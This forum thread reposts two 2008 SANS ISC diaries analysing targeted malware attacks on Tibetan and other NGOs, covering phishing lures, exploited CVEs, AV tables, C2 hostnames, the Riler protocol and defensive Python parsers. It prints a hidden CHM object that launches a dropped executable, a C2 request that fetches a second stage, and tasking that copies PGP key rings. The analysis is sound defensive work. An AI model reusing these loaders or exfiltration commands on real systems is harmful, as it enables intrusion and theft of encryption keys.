
A short excursion into Chinatown (continued)


Loo


Actually I don't know what there is to hide here, but the file with this presentation keeps getting scrubbed from everywhere. A review of the Chinese attacks and the methodology of protecting Chinese networks

China_Cyber___Fair_Use_1_.pdf


  • 2 weeks later...

more information

_ttp://isc.sans.org/diary.html?n&storyid=4177

Cyber attacks against Tibetan communities

Published: 2008-03-21,

Last Updated: 2008-03-22 12:26:51 UTC

by Maarten Van Horenbeeck (Version: 4)

There is lots of media coverage on the protests in Tibet. Something that lies under the surface, and rarely gets a blip in the press, is the various targeted cyber attacks that have been taking place against these various communities recently.

These attacks are not limited to various Tibetan NGOs and support groups. They have been reported dating back to 2002, and even somewhat before that, and have affected several other communities, including Falun Gong and the Uyghurs.

 

The attacks generally start with a very trustworthy looking e-mail, being spoofed as originating from a known contact, to someone within a community. Some impressive social engineering tricks are used:

* Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' is invoked between the reader's pre-existent beliefs and the statement. There's a natural urge to click on the attachment to confirm that belief;
* The writing style of the purported sender is usually well researched to have the message look as believable as possible;
* The content of the document actually matches closely what was discussed in the e-mail message;
* Having legitimate, trusted, users actually forward along a message back into the community.

The messages contain an attachment which exploits a client side vulnerability. Generally these are:

* CHM Help files with embedded objects;
* Acrobat Reader PDF exploits;
* Microsoft Office exploits;
* LHA files exploiting vulnerabilities in WinRAR;
* Exploitation of an ActiveX component through an attached HTML file.

Here's a sample attachment and its AV coverage at the time it was distributed:

reports_of_violence_in_tibet.ppt
MD5 977a4ac91acf5d88044a68f828154155

Engine | Version | Signature date | Result
AhnLab-V3 | 2008.3.20.2 | 2008.03.20 | -
AntiVir | 7.6.0.75 | 2008.03.20 | EXP/Office.Dropper.Gen
Authentium | 4.93.8 | 2008.03.20 | -
Avast | 4.7.1098.0 | 2008.03.20 | MPPT97:CVE-2006-3590
AVG | 7.5.0.516 | 2008.03.20 | -
BitDefender | 7.2 | 2008.03.20 | Exploit.PPT.Gen
CAT-QuickHeal | 9.50 | 2008.03.20 | -
ClamAV | 0.92.1 | 2008.03.20 | -
DrWeb | 4.44.0.09170 | 2008.03.20 | -
eSafe | 7.0.15.0 | 2008.03.18 | -
eTrust-Vet | 31.3.5629 | 2008.03.20 | -
Ewido | 4.0 | 2008.03.20 | -
F-Prot | 4.4.2.54 | 2008.03.19 | File is damaged
F-Secure | 6.70.13260.0 | 2008.03.20 | -
FileAdvisor | 1 | 2008.03.20 | -
Fortinet | 3.14.0.0 | 2008.03.20 | -
Ikarus | T3.1.1.20 | 2008.03.20 | -
Kaspersky | 7.0.0.125 | 2008.03.20 | -
McAfee | 5256 | 2008.03.20 | -
Microsoft | 1.3301 | 2008.03.20 | -
NOD32v2 | 2964 | 2008.03.20 | PP97M/TrojanDropper.Agent.NAI
Norman | 5.80.02 | 2008.03.20 | -
Panda | 9.0.0.4 | 2008.03.20 | -
Prevx1 | V2 | 2008.03.20 | -
Rising | 20.36.32.00 | 2008.03.20 | -
Sophos | 4.27.0 | 2008.03.20 | -
Sunbelt | 3.0.978.0 | 2008.03.18 | -
Symantec | 10 | 2008.03.20 | -
TheHacker | 6.2.92.250 | 2008.03.19 | -
VBA32 | 3.12.6.3 | 2008.03.17 | -
VirusBuster | 4.3.26:9 | 2008.03.20 | -
Webwasher-Gateway | 6.6.2 | 2008.03.20 | Exploit.Office.Dropper.Gen

As you can see, anti-virus is generally not proving effective against the samples distributed in this ongoing attack. We often see similar samples returning, only to have been edited slightly to prevent them from being picked up.

Most of the time, the samples then drop very raw trojans not restricted much in ability. This means that only investigating the trojan does not always reveal the data targeted. To investigate, it's necessary to find out which commands were submitted. So far, we have uncovered attacks that specifically searched the file system for Word documents, e-mail contents and, most interestingly, PGP keyrings.

 

If you’re interested in this, you may like to read Crouching Powerpoint, Hidden Trojan, a presentation I gave earlier in the year on similar attacks against Falun Gong. Brian Krebs at the Washington Post has also written on the unfolding events. Mikko at F-Secure, Sophos and McAfee AVERT also have very interesting blog postings up on the topic.

 

We've been working with several groups on these attacks since early 2007. If you or your organization has also been targeted, now or in the past, please get in touch. We will not publish any data on your specific attacks without your permission.

 


and another continuation - http://isc.sans.org/diary.html?n&storyid=4177

 

This hopefully helps you identify the risk similar attacks would pose to your organization. The diary does not deal with one incident, but looks at overall findings.

1. The message

 

The sole goal of the message is to transport the exploit, and to convince the reader to click on it, so the malicious code can execute.

 

Several social engineering tricks have been seen:

 

* Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' arises between the reader's pre-existent beliefs and the statement. This urges the reader to click the message;

* The writing style of the purported sender is well researched and mimicked;

* The content of the document matches the topic of the e-mail message;

* Legitimate, trusted, users are sometimes convinced to actually forward along a message back to specific targets;

* In a number of cases, “memes” distributed within the community have been reused. For instance, a “viral” Word document was grabbed from a forum, edited to include the exploit and Trojan code, and forwarded onto other members of the community.

 

Here’s a sample. This message was sent to someone very active within the Tibetan community, and was spoofed as originating from the Secretary of International Relations of the Central Tibetan Administration, the government in exile in Dharamshala, India. The name and contact details of the official were accurate:

All,

Attached here is the update Human Rights Report on Tibet issued by
Department of State of U.S.A on March 11, 2008.

You may also visit the site:

Tashi Deleg,

Sonam Dagpo

Secretary of International Relations
Department of Information & International Relations
Central Tibetan Administration
Dharamshala -176215
H.P., INDIA
Ph.: [obfuscated]
Fax: [obfuscated]
E-mail: [obfuscated]@gov.tibet.net or diir-pa@gov.tibet.net
Website: http://www.tibet.net/en/diir/


In some cases, messages were sent which addressed the recipient by his first name, and provided “clarification on a topic” which had previously been discussed between the sender and the recipient. While not evidence, there are specific instances in which it appears previously compromised accounts were re-used to engage in better social engineering.

2. The exploit

 

The messages contain an attachment which exploits a client side vulnerability. The most common vectors so far have been:

 

* CHM Help files with embedded objects;

* CVE-2008-0655: Acrobat Reader PDF exploit

* CVE-2006-2492, CVE-2007-3899: Word

* CVE-2006-3590, CVE-2006-0009: Powerpoint

* CVE-2008-0081: Excel

* CVE-2005-0944: Microsoft Access

* CVE-2006-3845: LHA files exploiting vulnerabilities in WinRAR.

 

The file exploits the vulnerability, and executes shellcode which generally unpacks at least two embedded components:

 

* The actual Trojan binary: Which can be packed (using UPX, Armadillo, FSG or PE-ARMOR), but in most cases is unpacked and easily retrievable from the file. It is described further in chapter 3 of this diary entry.

* A benign, non-malicious document of the same file type: upon successful execution of the exploit code, it generally “cleans up” and instead of showing an indication that the application has crashed, it drops a clean file to disk (be it either RAR, DOC, PPT or any of the other files affected) and opens it.

 

The second file shows context very valid to the message initially sent. An example image is included for reference below. This was grabbed from what was sent as a promotional flyer on a book on Tibet. In the background, it dropped a Trojan. Both the flyer and the book exist in real-life form, unbugged. This was an example of taking something which "exists" within the community, and republishing it with trojaned contents.

 

These files usually have very low AV coverage. Below is sample Virustotal output for the malicious PDF sample:

China’s Tibet.pdf
MD5 70d0d15041a14adaff614f0b7bf8c428

Engine | Version | Signature date | Result
AhnLab-V3 | 2008.3.22.1 | 2008.03.21 | -
AntiVir | 7.6.0.75 | 2008.03.21 | -
Authentium | 4.93.8 | 2008.03.20 | -
Avast | 4.7.1098.0 | 2008.03.21 | -
AVG | 7.5.0.516 | 2008.03.21 | -
BitDefender | 7.2 | 2008.03.21 | -
CAT-QuickHeal | 9.50 | 2008.03.20 | -
ClamAV | 0.92.1 | 2008.03.21 | -
DrWeb | 4.44.0.09170 | 2008.03.21 | -
eSafe | 7.0.15.0 | 2008.03.18 | -
eTrust-Vet | 31.3.5631 | 2008.03.21 | -
Ewido | 4.0 | 2008.03.21 | -
F-Prot | 4.4.2.54 | 2008.03.20 | -
F-Secure | 6.70.13260.0 | 2008.03.21 | -
FileAdvisor | 1 | 2008.03.21 | -
Fortinet | 3.14.0.0 | 2008.03.21 | -
Ikarus | T3.1.1.20 | 2008.03.21 | -
Kaspersky | 7.0.0.125 | 2008.03.21 | -
McAfee | 5257 | 2008.03.21 | -
Microsoft | 1.3301 | 2008.03.21 | -
NOD32v2 | 2966 | 2008.03.21 | -
Norman | 5.80.02 | 2008.03.20 | -
Panda | 9.0.0.4 | 2008.03.21 | -
Prevx1 | V2 | 2008.03.21 | -
Rising | 20.36.42.00 | 2008.03.21 | -
Sophos | 4.27.0 | 2008.03.21 | Mal/JSShell-B
Sunbelt | 3.0.978.0 | 2008.03.18 | -
Symantec | 10 | 2008.03.21 | -
TheHacker | 6.2.92.250 | 2008.03.19 | -
VBA32 | 3.12.6.3 | 2008.03.21 | -
VirusBuster | 4.3.26:9 | 2008.03.21 | Exploit.PDF.A
Webwasher-Gateway | 6.6.2 | 2008.03.21 | Exploit.PDF.ZoneBac.gen (suspicious)


3. The backdoor

 

Upon successful exploitation, the dropper installs a Trojan. We have monitored over 8 different Trojan families in use. Quite common are Enfal, Riler and Protux. In addition, control over some machines is maintained using the Gh0st RAT remote access tool.

 

These trojans generally allow close to unrestricted access to the system under the user account which installed the Trojan. Many machines involved in this incident are home desktops, so this is often the administrator account. The backdoor generally triggers a few generic signatures, but has very low AV coverage at the time of distribution.

 

Below is a sample extracted from a malicious Excel document:

event_0310_result.exe
MD5 7d62cec8f022e9599885ad7d079d2f60

Engine | Version | Signature date | Result
AhnLab-V3 | 2008.3.4.0 | 20080310 | found nothing
AntiVir | 7.6.0.73 | 20080310 | found [HEUR/Malware]
Authentium | 4.93.8 | 20080307 | found nothing
Avast | 4.7.1098.0 | 20080309 | found nothing
AVG | 7.5.0.516 | 20080310 | found nothing
BitDefender | 7.2 | 20080310 | found nothing
CAT-QuickHeal | 9.50 | 20080308 | found nothing
ClamAV | None | 20080310 | found nothing
DrWeb | 4.44.0.09170 | 20080310 | found nothing
eSafe | 7.0.15.0 | 20080309 | found nothing
eTrust-Vet | 31.3.5597 | 20080307 | found nothing
Ewido | 4.0 | 20080310 | found nothing
F-Prot | 4.4.2.54 | 20080309 | found nothing
F-Secure | 6.70.13260.0 | 20080310 | found [suspicious:W32/Malware!Gemini]
FileAdvisor | 1 | 20080310 | found nothing
Fortinet | 3.14.0.0 | 20080310 | found nothing
Ikarus | T3.1.1.20 | 20080310 | found nothing
Kaspersky | 7.0.0.125 | 20080310 | found nothing
McAfee | 5247 | 20080307 | found nothing
Microsoft | 1.3301 | 20080310 | found nothing
NOD32v2 | 2935 | 20080310 | found nothing
Norman | 5.80.02 | 20080307 | found nothing
Panda | 9.0.0.4 | 20080309 | found nothing
Prevx1 | V2 | 20080310 | found [Heuristic: Suspicious Self Modifying File]
Rising | 20.35.02.00 | 20080310 | found nothing
Sophos | 4.27.0 | 20080310 | found [Mal/Behav-116]
Sunbelt | 3.0.930.0 | 20080305 | found nothing
Symantec | 10 | 20080310 | found nothing
TheHacker | 6.2.92.239 | 20080309 | found nothing
VBA32 | 3.12.6.2 | 20080305 | found nothing
VirusBuster | 4.3.26:9 | 20080309 | found nothing
Webwasher-Gateway | 6.6.2 | 20080310 | found [Heuristic.Malware]


4. The control connection

 

In order for the Trojan to be effective, it needs to “phone home”. This usually (but not always) consists of two steps:

 

* A DNS lookup to acquire the address of the control server;

* The actual connection.

 

The DNS lookup occurs for a hostname embedded in the Trojan. So far, we have tracked over 50 unique hostnames. Some are used against a single organization or individual, others are used across the spectrum to many different targets.

 

Interestingly, attacks are “timed”. Let’s look at some DNS resolution logs:

+ 2008-03-22 06:05 | dns3.westcowboy.com | 210.162.89.242
- 2008-03-22 06:05 | dns3.westcowboy.com | 127.0.0.1
+ 2008-03-22 15:07 | dns3.westcowboy.com | 127.0.0.1
- 2008-03-22 15:07 | dns3.westcowboy.com | 210.162.89.242
+ 2008-03-23 07:18 | dns3.westcowboy.com | 210.162.89.242
- 2008-03-23 07:18 | dns3.westcowboy.com | 127.0.0.1
+ 2008-03-23 09:54 | dns3.westcowboy.com | 127.0.0.1
- 2008-03-23 09:54 | dns3.westcowboy.com | 210.162.89.242

 

When the hostname resolves to one of the above IP addresses, a connection is set up. When it resolves to 127.0.0.1 however, the compromised machine will no longer connect out.

 

As several IDS rules are available to trigger on lookups that result in 127.0.0.1, we are also seeing samples that contain a check for a specific ‘code’ IP. When the control server resolves to this address, the Trojan holds for a few minutes, then does another lookup. These “parking addresses” have included 43.44.43.44 and 63.64.63.64.

 

In the above example, this indicates that the team behind these attacks was busy gathering data from 06:05 till 15:07, only to start again almost exactly one day later, 07:18.

 

In a few cases, the control connection has been regular HTTP or HTTPS, set up using code injected into the Internet Explorer process. This allows the Trojan to be proxy-aware. In other instances, there have been control connections that were fully binary (such as Gh0st RAT) or encrypted using an obvious XOR key.

 

Some control connections can be detected on the network or proxy level, such as those of certain Riler and Enfal families:

 

When started, Enfal issues HTTP POST requests to the controller for:

/cgi-bin/Owpq4.cgi
/cgi-bin/Fupq9.cgi

The Riler Trojan family can also be identified through its connection protocol (bold is the infected client submitting data):

NAME:
NAME: [hostname].VER: Stealth 2.6 MARK: fl510 OS: NT 5.0.L_IP: 10.2.0.18.ID: NoID.
LONG:0501_LOG.txt
NULL
AUTO
ERR code = 02
SNIF
ERR code = 02
WAKE
WAKE

It also has a recognizable command set:

LOCK SEND WAKE NAME MOON KEEP DISK FILE
DONE DOWN LONG MAKE ATTR KILL LIKE SEEK
READ DEAD DDLL AUTO READY


5. The control server

 

The vast majority of control servers were identified on Chinese netblocks. However, servers have been identified in the USA, South Korea and Taiwan. The host names pointing to these servers are often configured on dynamic DNS services such as 3322.org. While these services in themselves are not malicious, they are heavily used in these specific attacks.

 

At the moment, it appears at least a number of the control servers have been compromised using open Terminal Services (RDP/3389) combined with weak passwords.

 

 

 

Based on the technical data, it is impossible to say who is the culprit in these attacks. What is however clear is that these NGOs are systematically hampered using malicious code, either with as goal to gain access to their communications, or to make them reluctant to use e-mail to begin with.

 

While this is not the full picture on the attacks, we hope this overview already proves useful, and please get in touch if you have questions or additional feedback.

 

Cheers,

 

Maarten Van Horenbeeck

Maarten at daemon.be
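The "timed" DNS behaviour described in section 4 is something a defender can hunt for in their own resolver logs. The following is an added example (not code from the diary or from ISC) that parses log lines in the diary's "+/- timestamp | host | ip" layout, recovers the periods during which each control hostname pointed at a live address, and flags hostnames that were ever parked on 127.0.0.1 or on one of the "code" IPs the diary lists. The dns3.westcowboy.com lines are the ones quoted above; c2.example.invalid and 198.51.100.7 are constructed values added to show the code-IP case.

```python
import re
from datetime import datetime

# Parking values from the diary: 127.0.0.1 stops the implant from connecting
# out, the other two are "code" IPs that make it wait a few minutes and retry.
PARKING = {"127.0.0.1", "43.44.43.44", "63.64.63.64"}
FMT = "%Y-%m-%d %H:%M"

# Constructed input in the diary's own layout. The dns3.westcowboy.com lines are
# quoted from the diary; c2.example.invalid is a made-up second hostname.
SAMPLE_LOG = """\
+ 2008-03-22 06:05 | dns3.westcowboy.com | 210.162.89.242
- 2008-03-22 06:05 | dns3.westcowboy.com | 127.0.0.1
+ 2008-03-22 15:07 | dns3.westcowboy.com | 127.0.0.1
- 2008-03-22 15:07 | dns3.westcowboy.com | 210.162.89.242
+ 2008-03-23 07:18 | dns3.westcowboy.com | 210.162.89.242
- 2008-03-23 07:18 | dns3.westcowboy.com | 127.0.0.1
+ 2008-03-23 09:54 | dns3.westcowboy.com | 127.0.0.1
- 2008-03-23 09:54 | dns3.westcowboy.com | 210.162.89.242
+ 2008-03-23 10:00 | c2.example.invalid | 198.51.100.7
- 2008-03-23 10:00 | c2.example.invalid | 43.44.43.44
+ 2008-03-23 11:30 | c2.example.invalid | 43.44.43.44
- 2008-03-23 11:30 | c2.example.invalid | 198.51.100.7
"""

# Only the "+" line of each pair matters: it carries the new answer.
NEW_ANSWER = re.compile(r"^\+ (\d{4}-\d\d-\d\d \d\d:\d\d) \| (\S+) \| (\S+)$")

def parse_changes(log):
    """Return [(time, host, new_ip)] for every resolution change, in log order."""
    return [(datetime.strptime(m.group(1), FMT), m.group(2), m.group(3))
            for m in map(NEW_ANSWER.match, log.splitlines()) if m]

def active_windows(log):
    """Return {host: [(start, end, ip)]}: the periods a hostname pointed at a
    live address, i.e. when implants would actually connect. Times are
    'YYYY-MM-DD HH:MM' strings; end is None if the host is still live."""
    windows, live = {}, {}          # live: host -> (start, ip) while unparked
    for t, host, ip in parse_changes(log):
        if ip not in PARKING:
            live.setdefault(host, (t, ip))
        elif host in live:
            start, live_ip = live.pop(host)
            windows.setdefault(host, []).append(
                (start.strftime(FMT), t.strftime(FMT), live_ip))
    for host, (start, live_ip) in live.items():
        windows.setdefault(host, []).append((start.strftime(FMT), None, live_ip))
    return windows

def parked_hosts(log):
    """Hostnames that ever flipped to a parking address: a strong hint of a
    timed control channel rather than a normally administered zone."""
    return sorted({h for _, h, ip in parse_changes(log) if ip in PARKING})
```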


and this is how PGP keys get stolen ;-)

 

_ttp://isc.sans.org/diary.html?n&storyid=4207

 

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27,

Last Updated: 2008-03-27 09:07:04 UTC

by Maarten Van Horenbeeck (Version: 1)


 

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

 

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

 

<object width="0" height="0" style="display:none;"
        type="application/x-oleobject" codebase="music.exe"></object>

 

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

 

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

 

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not to be a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

 

This file subsequently connected to a second server, being the actual control server. It sent an identical registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This was much shorter, and once decoded, turned out to be:

 

<Command Begin>

netmgetr usb:\*.doc

netmgetr usb:\*.pkr

netmgetr usb:\*.skr

netlsr usb:\*.*

<Command End>

 

Upon further review of the trojan code, netmgetr scans the file system for a filename and then copies it from the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but this was more proof-of-concept code.

 

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to ”map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

 

There are two things we can learn from this:

 

* It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";

* When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

 

Cheers,

 

Maarten Van Horenbeeck

maarten at daemon.be
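An incident responder who captures the BASE64 reply described above wants to know quickly what the tasking asks for. The following is an added example (not code from the diary or from ISC) that decodes such a reply, parses the <Command Begin>/<Command End> block, and reports whether the collection verb was pointed at PGP key rings. The reply is reconstructed here by re-encoding the command block quoted above; netmgetr is treated as the only collection verb because that is what the diary describes.

```python
import base64
import re

# The verb the diary says collects files, and the key-ring extensions it asked
# for (.pkr = PGP public key ring, .skr = PGP secret key ring).
GET_VERBS = {"netmgetr"}
KEY_MATERIAL = {".pkr", ".skr"}

# Constructed stand-in for the controller's BASE64 reply: the decoded command
# block quoted above, re-encoded here so the example exercises the decode step.
SAMPLE_REPLY = base64.b64encode(
    b"<Command Begin>\r\n"
    b"netmgetr usb:\\*.doc\r\n"
    b"netmgetr usb:\\*.pkr\r\n"
    b"netmgetr usb:\\*.skr\r\n"
    b"netlsr usb:\\*.*\r\n"
    b"<Command End>\r\n"
).decode("ascii")

COMMAND = re.compile(r"^(\S+)\s+(\S+)$")

def decode_commands(reply_b64):
    """Decode the reply and return [(verb, argument)] found between the
    <Command Begin> and <Command End> markers; anything outside is ignored."""
    text = base64.b64decode(reply_b64).decode("latin-1")
    block = re.search(r"<Command Begin>(.*?)<Command End>", text, re.S)
    if not block:
        return []
    matches = (COMMAND.match(line.strip()) for line in block.group(1).splitlines())
    return [(m.group(1), m.group(2)) for m in matches if m]

def collected_extensions(commands):
    """Lower-cased extensions the collection verbs ask for; listing verbs such
    as netlsr are ignored because they do not exfiltrate file contents."""
    exts = set()
    for verb, arg in commands:
        if verb.lower() in GET_VERBS and "." in arg:
            exts.add("." + arg.rsplit(".", 1)[1].lower())
    return exts

def key_ring_targets(reply_b64):
    """Key-material extensions the operator asked for, empty if none: a non-empty
    result means the tasking goes after PGP key rings, not only documents."""
    return collected_extensions(decode_commands(reply_b64)) & KEY_MATERIAL
```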
